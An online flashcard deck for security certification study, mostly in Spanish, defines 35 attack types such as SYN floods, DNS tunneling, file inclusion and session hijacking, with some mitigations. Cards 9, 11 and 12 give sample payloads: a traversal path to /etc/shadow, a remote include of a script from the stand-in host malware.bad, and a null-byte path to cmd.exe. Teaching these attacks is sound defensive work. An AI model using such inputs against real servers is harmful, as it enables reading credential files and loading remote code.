Malicious Activity (Domain 2.4) Flashcards

(35 cards)

1
Q

SYN Flood

A

● Iniciar varias sesiones TCP sin completar el protocolo de enlace de tres vías
● Consume recursos del servidor e impide conexiones legítimas
● Contramedidas
○ Flood guard
○ Timeout configurations
○ Intrusion prevention systems

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Permanent Denial of Service (PDOS) Attack

A

■ Aprovecha las vulnerabilidades de seguridad para dañar permanentemente un dispositivo de red al actualizar su firmware.
■ Requiere una recarga completa del firmware para que el dispositivo vuelva a estar en línea.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Fork Bomb

A

■ El ataque crea una gran cantidad de procesos, consumiendo potencia de procesamiento.
■ No se considera un gusano, ya que no infecta programas ni utiliza la red.
■ Su naturaleza autorreplicante provoca una condición de denegación de servicio.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

DNS Amplification Attack

A

○ Ataque DDoS especializado que permite a un atacante iniciar solicitudes DNS desde una dirección IP falsa (la IP de la victima) para inundar un sitio web.

● Mitigación
○ Limitar el tamaño de las respuestas DNS.
○ Limitar la velocidad del tráfico de respuesta DNS para reducir el impacto.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

DNS Cache Poisoning (DNS Spoofing)

A

● Corrompe la caché de un solucionador DNS con información falsa.
● Redirige a los usuarios a sitios web maliciosos.
● Mitigación.
○ Utiliza DNSSEC (Extensiones de Seguridad del Sistema de Nombres de Dominio) para añadir firmas digitales a los datos DNS.
○ Implementa configuraciones de red seguras y firewalls para proteger los servidores DNS.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

DNS Tunneling

A

● Encapsula el tráfico que no es DNS (p. ej., HTTP, SSH) a través del puerto 53.
● Intenta eludir las reglas del firewall para comando y control o exfiltración de datos.
● Mitigación.
○ Supervisa y analiza los registros DNS para detectar patrones inusuales que indiquen tunelización.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Domain Hijacking (Domain Theft)

A

● Cambio no autorizado del registro de dominio
● Puede provocar la pérdida del control del sitio web y la redirección a un sitio malicioso.
● Mitigación
○ Actualice y proteja periódicamente la información de la cuenta de registro.
○ Utilice servicios de bloqueo del registro de dominio para evitar cambios no autorizados.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

DNS Zone Transfer Attacks

A

● Intenta obtener una copia completa de los datos de la zona DNS
● Expone información confidencial sobre la infraestructura de red de un dominio
● Podría utilizarse para reconocimiento en futuros ataques

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Directory Traversal Attack

A

■ Un ataque de inyección ocurre cuando el atacante inserta código malicioso a través de la interfaz de una aplicación.
■ Ataque de aplicación que permite el acceso a comandos, archivos y directorios que pueden o no estar conectados al directorio raíz del documento web.

http://diontraining.com/../../../../etc/shadow

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

File Inclusion

A

Vulnerabilidad en aplicaciones web que permite a un atacante descargar un archivo desde una ubicación arbitraria en el sistema de archivos del host o cargar un archivo ejecutable o script para abrir una puerta trasera.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Remote File Inclusion

A

● Un atacante ejecuta un script para inyectar un archivo remoto en la aplicación web o el sitio web.
○https://diontraining.com/login.php?
○user=http://malware.bad/malicious.php

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Local File Inclusion

A

● Un atacante agrega un archivo a la aplicación web o al sitio web que ya existe en el servidor de alojamiento.
○ https://diontraining.com/login.php
○ usuario= ../../Windows/system32/cmd.exe%00

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Arbitrary Code Execution

A

■ La vulnerabilidad permite a un atacante ejecutar su código sin restricciones.
■ Permite a los atacantes ejecutar su código en el sistema objetivo.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Remote Code Execution

A

Tipo de ejecución de código arbitrario que ocurre de forma remota, a menudo a través de internet.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

Vertical Privilege Escalation

A

● Pasar de usuario normal a usuario con privilegios más altos (p. ej., administrador o root)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Horizontal Privilege Escalation

A

● Acceder o modificar recursos al mismo nivel que el atacante
● Ocurre cuando un usuario intenta acceder a recursos para los que no tiene permisos al mismo nivel

17
Q

Kernel Mode Rootkit

A

● Integrado en el kernel (Ring Zero)
● Tiene máximo control y privilegios
● Altamente peligroso debido al amplio acceso al sistema

18
Q

User Mode Rootkit

A

● Conectado a componentes de nivel de usuario (Anillos 1 a 3)
● Tiene privilegios de administrador
● Utiliza funciones del sistema operativo para la persistencia, por ejemplo, el registro o el programador de tareas

19
Q

Replay Attacks

A

Tipo de ataque basado en la red en el que transmisiones de datos válidas se retransmiten, repiten o retrasan de forma maliciosa o fraudulenta.
■ Implica interceptar datos, analizarlos y decidir si se retransmiten posteriormente.

20
Q

Session Management

A

■ Componente fundamental de seguridad en aplicaciones web
■ Permite que las aplicaciones web identifiquen de forma única a un usuario en diversas acciones y solicitudes, a la vez que conserva el estado de los datos generados por el usuario y garantiza que se asignen a ese usuario.

21
Q

Session Hijacking

A

■ Un tipo de ataque de suplantación de identidad donde el atacante desconecta un host y lo reemplaza con su propia máquina, falsificando la dirección IP del host original.
■ Los ataques de secuestro de sesión pueden ocurrir mediante el robo o la modificación de cookies.

22
Q

Session Prediction Attacks

A

■ Un tipo de ataque de suplantación de identidad en el que el atacante intenta predecir el token de sesión para secuestrar una sesión.
■ Un token de sesión debe generarse mediante un algoritmo no predecible y no debe revelar ninguna información sobre el cliente de la sesión.

23
Q

Cookie Poisoning

A

Modifica el contenido de una cookie después de que el servicio web la haya generado y enviado al navegador del cliente para que la cookie recién modificada pueda utilizarse para explotar vulnerabilidades en la aplicación web.

24
Q

On-Path Attack

A

■ Un ataque en el que el atacante posiciona su estación de trabajo lógicamente entre dos hosts durante la comunicación.
■ El atacante captura, monitorea y retransmite de forma transparente las comunicaciones entre esos hosts.

25
Methods for On-Path Attacks
■ ARP Poisoning: Manipulación de tablas del Protocolo de Resolución de Direcciones (ARP) para redirigir el tráfico de red ■ DNS Poisoning: Alteración de las respuestas DNS para redirigir el tráfico ■ Rogue Wireless Access Point: Creación de un punto de acceso inalámbrico falso para interceptar el tráfico ■ Rogue Hub or Switch: Introducción de un concentrador o conmutador malicioso para capturar datos en una red cableada
26
Replay Attack
■ Ocurre cuando un atacante captura datos válidos y luego los reproduce inmediatamente o con retraso. ■ Es común en ataques a redes inalámbricas; también se puede usar en redes cableadas.
27
Relay Attack
■ El atacante se convierte en parte de la conversación entre dos hosts. ■ Actúa como proxy y puede leer o modificar las comunicaciones entre los hosts. ■ Todo el tráfico entre el cliente y el servidor pasa por el atacante.
28
SSL Stripping
○ Un ataque que engaña a la aplicación de cifrado para que presente una conexión HTTP en lugar de HTTPS. ○ Permite a los atacantes capturar datos sin cifrar cuando el usuario cree que está utilizando una conexión segura.
29
Lightweight Directory Access Protocol (LDAP)
Un protocolo de aplicación industrial, abierto, independiente del proveedor y estándar para acceder y mantener servicios de información de directorio distribuidos a través de una red de protocolos de Internet.
30
LDAP Injection
■ Un ataque de aplicación que se dirige a aplicaciones web mediante la fabricación de declaraciones LDAP que normalmente se crean mediante la entrada del usuario. ■ Utiliza la validación y el saneamiento de entradas como protección contra un ataque de inyección LDAP.
31
Command Injection
Se produce cuando un atacante puede ejecutar comandos de shell arbitrarios en un host a través de una aplicación web vulnerable.
32
Process Injection
Método de ejecución de código arbitrario en el espacio de direcciones de un proceso activo independiente.
33
Concurrent Session Usage
■ Se refiere a múltiples sesiones activas desde una sola cuenta de usuario. ■ Indica una posible vulneración de la cuenta cuando el usuario legítimo también ha iniciado sesión.
34
Blocked Content
■ Implica intentos de acceder o descargar contenido bloqueado por protocolos de seguridad. ■ Sugiere que un usuario intenta acceder a contenido malicioso o que un atacante intenta robar datos.
35
Resource Inaccessibility
■ Incapacidad para acceder a recursos como archivos, bases de datos o servicios de red. ■ Sugiere un ataque de ransomware, donde se cifran los archivos y se exige un rescate.